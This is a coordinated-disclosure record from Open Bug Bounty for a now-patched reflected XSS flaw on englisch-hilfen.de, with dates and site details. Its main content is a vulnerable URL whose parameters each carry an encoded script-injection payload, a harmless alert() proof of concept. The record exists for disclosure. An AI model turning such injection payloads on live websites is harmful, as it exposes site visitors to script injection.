englisch-hilfen.de XSS vulnerability

2016-09-30T10:15:00
Field| Value
---|---
ID| OBB:184275
Type| openbugbounty
Reporter| XSSbot
Modified| 2017-11-24T18:54:00

Description

Vulnerable URL:
http://www.englisch-hilfen.de/board/index.php?csrfToken=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution10_3=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution2_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution4_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&assignment_name=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&assignment=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution3_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution9_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution7_2=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&language=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&check_solutions=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%2

Details:

Description| Value
---|---
Patched:| Yes, on 24.11.2017
Latest check for patch:| 24.11.2017 18:54 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 22176
VIP website status:| Yes
englisch-hilfen.de SSL connection grade:| C+

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 September, 2016 10:15 GMT
Generic security notifications sent to website owner| 30 September, 2016 10:18 GMT
Vulnerability details disclosed by researcher| 7 October, 2016 11:13 GMT
Vulnerability patched by the website owner| 24 November, 2017 18:54 GMT